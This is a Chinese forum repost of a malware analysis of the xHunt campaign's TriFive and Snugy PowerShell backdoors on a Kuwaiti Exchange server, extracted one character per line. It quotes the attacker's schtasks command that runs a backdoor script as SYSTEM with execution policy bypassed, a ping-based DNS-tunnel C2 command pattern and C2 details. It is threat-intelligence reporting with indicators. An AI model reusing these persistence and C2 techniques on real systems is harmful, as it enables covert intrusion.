论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
逆向
[16241] 2020-12-23_恶意软件分析:xHunt活动又使用了新型后门
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-18
逆向
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-12-23_恶意软件分析:xHunt活动又使用了新型后门
恶
意
软
件
分
析
:
x
H
u
n
t
活
动
又
使
用
了
新
型
后
门
A
l
p
h
a
_
h
4
c
k
F
r
e
e
B
u
f
2
0
2
0
-
1
2
-
2
3
写
在
前
面
的
话
写
在
前
面
的
话
x
H
u
n
t
活
动
从
2
0
1
8
年
7
月
份
一
直
活
跃
至
今
,
这
个
组
织
的
主
要
目
标
针
对
的
是
科
威
特
政
府
和
航
运
运
输
组
织
。
近
期
研
究
人
员
发
现
,
x
H
u
n
t
的
攻
击
者
又
攻
击
了
科
威
特
一
家
机
构
的
M
i
c
r
o
s
o
f
t
E
x
c
h
a
n
g
e
服
务
器
。
虽
然
我
们
无
法
确
认
攻
击
者
是
如
何
入
侵
这
台
E
x
c
h
a
n
g
e
服
务
器
的
,
但
是
根
据
此
次
事
件
相
关
的
计
划
任
务
创
建
时
间
戳
,
我
们
发
现
攻
击
者
早
在
2
0
1
9
年
8
月
2
2
日
之
前
就
已
经
能
够
访
问
这
台
E
x
c
h
a
n
g
e
服
务
器
了
。
在
此
活
动
中
,
攻
击
者
使
用
了
两
个
后
门
,
一
个
是
T
r
i
F
i
v
e
,
另
一
个
是
S
n
u
g
y
的
变
种
版
本
(
这
是
一
个
W
e
b
S
h
e
l
l
,
我
们
称
之
为
B
u
m
b
l
e
B
e
e
)
。
T
r
i
F
i
v
e
和
S
n
u
g
y
后
门
本
质
上
是
P
o
w
e
r
S
h
e
l
l
脚
本
,
可
以
帮
助
攻
击
者
访
问
被
入
侵
的
E
x
c
h
a
n
g
e
服
务
器
,
并
使
用
不
同
的
C
2
信
道
来
进
行
通
信
。
T
r
i
F
i
v
e
后
门
使
用
的
是
一
个
基
于
电
子
邮
件
的
信
道
,
这
个
信
道
可
以
使
用
E
x
c
h
a
n
g
e
W
e
b
服
务
(
E
W
S
)
在
被
入
侵
的
电
子
邮
件
帐
号
的
已
删
除
邮
件
夹
中
创
建
邮
件
草
稿
。
S
n
u
g
y
后
门
则
使
用
的
是
D
N
S
隧
道
来
实
现
命
令
控
制
。
具
体
分
析
请
大
家
继
续
阅
读
下
文
。
T
r
i
F
i
v
e
和
和
S
n
u
g
y
后
门
后
门
在
2
0
2
0
年
9
月
份
,
我
们
发
现
x
H
u
n
t
攻
击
者
入
侵
了
科
威
特
的
一
家
机
构
组
织
。
该
组
织
的
E
x
c
h
a
n
g
e
服
务
器
上
出
现
了
通
过
I
I
S
进
程
w
3
w
p
.
e
x
e
执
行
可
以
命
令
的
行
为
。
攻
击
者
在
发
送
这
些
命
令
时
,
使
用
的
是
一
个
被
称
为
B
u
m
b
l
e
B
e
e
的
W
e
b
S
h
e
l
l
,
它
已
经
被
安
装
在
了
受
感
染
的
E
x
c
h
a
n
g
e
服
务
器
。
我
们
在
分
析
服
务
器
日
志
时
,
发
现
了
两
个
由
攻
击
者
创
建
的
计
划
任
务
,
这
两
个
任
务
都
会
运
行
恶
意
的
P
o
w
e
r
S
h
e
l
l
脚
本
。
我
们
现
在
还
无
法
确
定
攻
击
者
是
否
使
用
了
这
些
P
o
w
e
r
S
h
e
l
l
脚
本
中
的
任
何
一
个
来
安
装
w
e
b
s
h
e
l
l
,
但
是
我
们
相
信
攻
击
者
在
日
志
记
录
事
件
之
前
就
已
经
访
问
过
这
台
E
x
c
h
a
n
g
e
服
务
器
了
。
攻
击
者
在
这
台
E
x
c
h
a
n
g
e
服
务
器
上
创
建
了
两
个
任
务
,
即
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
和
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
,
这
两
个
任
务
都
是
在
c
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
t
a
s
k
s
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
W
D
I
文
件
夹
中
创
建
的
。
默
认
情
况
下
,
该
文
件
夹
在
W
i
n
d
o
w
s
系
统
上
还
存
储
一
个
合
法
的
R
e
s
o
l
u
t
i
o
n
H
o
s
t
任
务
,
具
体
如
下
图
所
示
。
合
法
的
R
e
s
o
l
u
t
i
o
n
H
o
s
t
任
务
与
W
i
n
d
o
w
s
诊
断
基
础
结
构
(
W
D
I
)
解
析
主
机
关
联
,
它
主
要
用
于
为
系
统
上
出
现
的
问
题
提
供
交
互
式
故
障
排
除
。
我
们
认
为
,
攻
击
者
选
择
这
个
任
务
名
称
主
要
是
为
了
隐
藏
自
己
的
攻
击
活
动
。
在
2
0
1
9
年
8
月
2
8
日
和
2
0
1
9
年
1
0
月
2
2
日
,
攻
击
者
创
建
了
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
和
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
任
务
,
以
运
行
两
个
独
立
的
基
于
P
o
w
e
r
S
h
e
l
l
的
后
门
。
攻
击
者
使
用
这
两
个
调
度
任
务
作
为
持
久
性
方
法
,
因
为
计
划
任
务
会
反
复
运
行
这
两
个
P
o
w
e
r
S
h
e
l
l
脚
本
,
不
过
运
行
的
时
间
间
隔
不
同
。
下
图
显
示
的
是
这
两
个
任
务
及
其
相
关
的
创
建
时
间
、
运
行
间
隔
和
执
行
的
命
令
。
这
两
个
任
务
执
行
的
命
令
将
尝
试
运
行
s
p
l
w
o
w
6
4
.
p
s
1
和
O
f
f
i
c
e
I
n
t
e
g
r
a
t
o
r
.
p
s
1
,
分
别
是
我
们
称
之
为
T
r
i
F
i
v
e
的
后
门
和
C
A
S
H
Y
2
0
0
的
变
种
(
我
们
称
之
为
S
n
u
g
y
)
。
这
些
脚
本
存
储
在
系
统
上
的
两
个
单
独
的
文
件
夹
中
,
这
很
可
能
是
为
了
避
免
两
个
后
门
都
被
发
现
和
删
除
。
上
图
还
显
示
,
T
r
i
F
i
v
e
后
门
每
5
分
钟
运
行
一
次
,
而
S
n
u
g
y
后
门
每
3
0
分
钟
运
行
一
次
。
我
们
无
法
确
认
间
隔
时
间
差
异
背
后
的
确
切
原
因
,
但
可
能
与
后
门
相
关
的
C
2
通
道
的
隐
蔽
性
有
关
。
比
如
说
,
S
n
u
g
y
使
用
D
N
S
隧
道
作
为
C
2
信
道
,
因
此
它
的
间
隔
可
能
比
T
r
i
F
i
v
e
长
,
与
T
r
i
F
i
v
e
使
用
的
基
于
电
子
邮
件
的
C
2
信
道
相
比
,
S
n
u
g
y
使
用
的
是
一
个
更
加
明
显
的
C
2
信
道
,
因
此
被
检
测
到
的
可
能
性
更
高
。
我
们
现
在
还
无
法
确
认
攻
击
者
是
如
何
创
建
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
和
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
任
务
的
。
但
是
,
我
们
知
道
攻
击
者
在
其
他
系
统
上
安
装
S
n
u
g
y
样
本
时
,
攻
击
者
使
用
的
是
批
处
理
脚
本
来
创
建
名
为
S
y
s
t
e
m
D
a
t
a
P
r
o
v
i
d
e
r
和
C
a
c
h
e
T
a
s
k
的
计
划
任
务
。
比
如
说
,
下
面
的
批
处
理
脚
本
将
创
建
并
运
行
名
为
S
y
s
t
e
m
D
a
t
a
P
r
o
v
i
d
e
r
的
计
划
任
务
,
并
最
终
运
行
名
为
x
p
s
r
c
h
v
w
.
p
s
1
的
S
n
u
g
y
样
本
:
s
c
h
t
a
s
k
s
/
c
r
e
a
t
e
/
s
c
M
I
N
U
T
E
/
m
o
5
/
t
n
“
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
S
i
d
e
S
h
o
w
S
y
s
t
e
m
D
a
t
a
P
r
o
v
i
d
e
r
”
/
t
r
“
p
o
w
e
r
s
h
e
l
l
-
e
x
e
c
b
y
p
a
s
s
-
f
i
l
e
C
:
W
i
n
d
o
w
s
T
e
m
p
x
p
s
r
c
h
v
w
.
p
s
1
”
/
r
u
S
Y
S
T
E
M
&
s
c
h
t
a
s
k
s
/
r
u
n
/
t
n
“
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
S
i
d
e
S
h
o
w
S
y
s
t
e
m
D
a
t
a
P
r
o
v
i
d
e
r
”
T
r
i
F
i
v
e
后
门
后
门
T
r
i
F
i
v
e
是
一
个
以
前
从
未
被
发
现
过
的
P
o
w
e
r
S
h
e
l
l
后
门
,
x
H
u
n
t
的
攻
击
者
会
在
受
感
染
的
E
x
c
h
a
n
g
e
服
务
器
上
安
装
这
个
后
门
,
并
通
过
一
个
计
划
任
务
每
五
分
钟
执
行
一
次
。
T
r
i
F
i
v
e
通
过
登
录
合
法
用
户
的
收
件
箱
并
从
“
已
删
除
邮
件
”
文
件
夹
中
的
电
子
邮
件
草
稿
中
获
取
P
o
w
e
r
S
h
e
l
l
脚
本
,
从
而
提
供
了
对
E
x
c
h
a
n
g
e
服
务
器
的
持
久
化
后
门
访
问
。
T
r
i
F
i
v
e
样
本
使
用
了
目
标
组
织
的
合
法
帐
户
名
和
凭
据
,
这
也
表
明
在
安
装
T
r
i
F
i
v
e
后
门
之
前
,
攻
击
者
已
成
功
窃
取
了
目
标
的
账
户
凭
证
。
事
实
上
,
基
于
电
子
邮
件
的
C
2
也
在
H
i
s
o
k
a
工
具
中
使
用
过
,
虽
然
H
i
s
o
k
a
工
具
使
用
电
子
邮
件
草
稿
发
送
和
接
收
数
据
,
但
这
些
草
稿
仍
保
留
在
草
稿
文
件
夹
中
,
而
T
r
i
F
i
v
e
后
门
则
专
门
将
其
电
子
邮
件
草
稿
保
存
到
“
已
删
除
邮
件
”
文
件
夹
中
。
为
了
向
后
门
发
出
命
令
,
攻
击
者
需
要
登
录
到
同
一
个
合
法
的
电
子
邮
件
帐
户
并
创
建
一
个
主
题
为
5
5
5
的
电
子
邮
件
草
稿
,
其
中
就
包
括
了
加
密
和
B
a
s
e
6
4
编
码
格
式
的
命
令
。
下
图
显
示
的
一
封
包
含
演
示
命
令
的
邮
件
,
主
题
为
5
5
5
,
邮
件
内
容
为
w
o
F
y
e
W
t
3
c
w
=
=
,
该
脚
本
将
通
过
P
o
w
e
r
S
h
e
l
l
执
行
:
为
了
运
行
攻
击
者
提
供
的
命
令
,
P
o
w
e
r
S
h
e
l
l
脚
本
需
要
登
录
到
E
x
c
h
a
n
g
e
服
务
器
上
的
合
法
电
子
邮
件
帐
户
,
并
检
查
“
已
删
除
邮
件
”
文
件
夹
中
主
题
为
5
5
5
的
电
子
邮
件
。
脚
本
将
打
开
电
子
邮
件
草
稿
,
并
使
用
B
a
s
e
6
4
解
码
电
子
邮
件
消
息
正
文
中
的
内
容
,
然
后
通
过
从
每
个
字
符
中
减
去
1
0
来
解
密
解
码
命
令
内
容
。
然
后
,
脚
本
会
使
用
P
o
w
e
r
S
h
e
l
l
的
内
置
I
n
v
o
k
e
E
x
p
r
e
s
s
i
o
n
(
i
e
x
)
c
m
d
l
e
t
来
生
成
明
文
内
容
。
在
执
行
提
供
的
P
o
w
e
r
S
h
e
l
l
代
码
之
后
,
脚
本
将
对
结
果
进
行
加
密
,
方
法
是
在
每
个
字
符
上
加
1
0
,
并
对
密
文
进
行
B
a
s
e
6
4
编
码
。
接
下
来
,
T
r
i
F
i
v
e
会
将
命
令
结
果
发
送
给
攻
击
者
,
并
将
编
码
的
密
文
设
置
为
电
子
邮
件
草
稿
的
消
息
体
,
它
将
保
存
在
主
题
为
5
5
5
的
“
已
删
除
邮
件
”
文
件
夹
中
。
下
图
显
示
了
T
r
i
F
i
v
e
脚
本
创
建
的
“
已
删
除
邮
件
”
文
件
夹
中
的
一
个
电
子
邮
件
草
稿
样
例
,
它
会
将
命
令
的
运
行
结
果
以
主
题
为
5
5
5
,
消
息
内
容
为
“
b
Q
B
5
A
H
g
A
f
g
B
5
A
H
0
A
e
Q
B
m
A
G
s
A
b
g
B
3
A
H
M
A
e
A
B
z
A
H
0
A
f
g
B
8
A
G
s
A
f
g
B
5
A
H
w
A
”
的
邮
件
进
行
发
送
。
T
r
i
F
i
v
e
P
o
w
e
r
S
h
e
l
l
脚
本
并
不
是
通
过
代
码
循
环
来
实
现
持
久
化
运
行
的
,
而
是
通
过
前
面
提
到
的
R
e
s
o
l
u
t
i
o
n
s
H
o
s
t
s
调
度
任
务
来
实
现
其
持
久
化
操
作
。
S
n
u
g
y
后
门
后
门
我
们
在
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
任
务
中
看
到
的
O
f
f
i
c
e
I
n
t
e
g
r
a
t
o
r
.
p
s
1
文
件
是
一
个
基
于
P
o
w
e
r
S
h
e
l
l
的
后
门
,
我
们
将
其
称
之
为
S
n
u
g
y
,
它
将
允
许
攻
击
者
获
取
目
标
系
统
的
主
机
名
并
执
行
命
令
。
S
n
u
g
y
是
C
A
S
H
Y
2
0
0
后
门
的
一
个
变
种
版
本
,
攻
击
者
也
曾
在
之
前
的
x
H
u
n
t
活
动
中
使
用
过
这
个
后
门
。
在
2
0
1
9
年
7
月
,
趋
势
科
技
曾
为
这
个
后
门
创
建
过
检
测
签
名
-
B
a
c
k
d
o
o
r
.
P
S
1
.
N
E
T
E
R
O
.
A
,
这
也
表
明
C
A
S
H
Y
2
0
0
的
这
个
特
殊
变
种
已
经
存
在
一
年
多
了
。
S
n
u
g
y
样
本
会
随
机
选
择
下
列
域
名
来
作
为
其
C
2
域
名
:
跟
C
A
S
H
Y
2
0
0
后
门
的
早
期
变
种
版
本
类
似
,
S
n
u
g
y
变
种
将
使
用
下
列
命
令
来
跟
自
定
义
域
名
连
接
,
并
尝
试
在
将
I
C
M
P
请
求
发
送
到
解
析
I
P
地
址
之
前
解
析
该
域
:
S
n
u
g
y
将
使
用
下
列
正
则
表
达
式
来
从
p
i
n
g
命
令
的
结
果
中
提
取
出
I
P
地
址
:
下
面
给
出
的
是
S
n
u
g
y
后
门
的
命
令
处
理
服
务
器
:
S
n
u
g
y
创
建
的
子
域
名
包
含
一
个
通
信
类
型
字
段
,
该
字
段
定
义
了
数
据
字
段
中
元
素
的
顺
序
,
下
面
给
出
是
C
2
域
名
结
构
:
跟
跟
x
H
u
n
t
有
关
的
基
础
设
施
有
关
的
基
础
设
施
h
o
t
s
o
f
t
[
.
]
i
c
u
u
p
l
e
a
r
n
[
.
]
t
o
p
l
i
d
a
r
c
c
[
.
]
i
c
u
d
e
m
a
n
1
[
.
]
i
c
u
c
m
d
/
c
p
i
n
g
-
n
1
<
c
u
s
t
o
m
c
r
a
f
t
e
d
s
u
b
-
d
o
m
a
i
n
>
.
<
C
2
d
o
m
a
i
n
>
b
(
?
:
(
?
:
2
5
[
0
-
5
]
|
2
[
0
-
4
]
[
0
-
9
]
|
[
0
1
]
?
[
0
-
9
]
[
0
-
9
]
?
)
.
)
{
3
}
(
?
:
2
5
[
0
-
5
]
|
2
[
0
-
4
]
[
0
-
9
]
|
[
0
1
]
?
[
0
-
9
]
[
0
-
9
]
?
)
b
<
c
h
a
r
a
c
t
e
r
f
o
r
c
o
m
m
u
n
i
c
a
t
i
o
n
t
y
p
e
>
<
c
h
a
r
a
c
t
e
r
f
o
r
o
r
d
e
r
o
f
f
i
e
l
d
s
i
n
d
a
t
a
s
e
c
t
i
o
n
>
<
d
a
t
a
s
e
c
t
i
o
n
>
.
<
C
2
d
o
m
a
i
n
>
入
侵
威
胁
指
标
入
侵
威
胁
指
标
I
o
C
T
r
i
F
i
v
e
样
本
:
样
本
:
4
0
7
e
5
f
e
4
f
6
9
7
7
d
d
2
7
b
c
0
0
5
0
b
2
e
e
8
f
0
4
b
3
9
8
e
9
b
d
2
8
e
d
d
9
d
4
6
0
4
b
7
8
2
a
9
4
5
f
8
1
2
0
f
S
n
u
g
y
样
本
:
样
本
:
c
1
8
9
8
5
a
9
4
9
c
a
d
a
3
b
4
1
9
1
9
c
2
d
a
2
7
4
e
0
f
f
a
6
e
2
c
8
c
9
f
b
4
5
b
a
d
e
5
5
c
1
e
3
b
6
e
e
9
e
1
3
9
3
6
c
1
3
0
8
4
f
2
1
3
4
1
6
0
8
9
b
e
e
c
7
d
4
9
f
0
e
f
4
0
f
e
a
3
d
2
8
2
0
7
0
4
7
3
8
5
d
d
a
4
5
9
9
5
1
7
b
5
6
e
1
2
7
e
f
a
a
5
a
8
7
a
f
b
b
1
8
f
c
6
3
d
b
f
4
5
2
7
c
a
3
4
b
6
d
3
7
6
f
1
4
4
1
4
a
a
1
e
7
e
b
9
6
2
4
8
5
c
4
5
b
f
3
8
3
7
2
a
4
a
0
e
c
9
4
d
d
6
8
1
c
0
3
0
d
6
6
e
8
7
9
f
f
4
7
5
c
a
7
6
6
6
8
a
c
c
4
6
5
4
5
b
b
a
f
f
4
9
b
2
0
e
1
7
6
8
3
f
9
9
c
S
n
u
g
y
C
2
域
名
:
域
名
:
d
e
m
a
n
1
[
.
]
i
c
u
h
o
t
s
o
f
t
[
.
]
i
c
u
u
p
l
e
a
r
n
[
.
]
t
o
p
l
i
d
a
r
c
c
[
.
]
i
c
u
s
h
a
r
e
p
o
i
n
t
-
w
e
b
[
.
]
c
o
m
计
划
任
务
名
称
:
计
划
任
务
名
称
:
R
e
s
o
l
u
t
i
o
n
H
o
s
t
s
R
e
s
o
l
u
t
i
o
n
s
H
o
s
t
s
S
y
s
t
e
m
D
a
t
a
P
r
o
v
i
d
e
r
C
a
c
h
e
T
a
s
k
-
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
逆向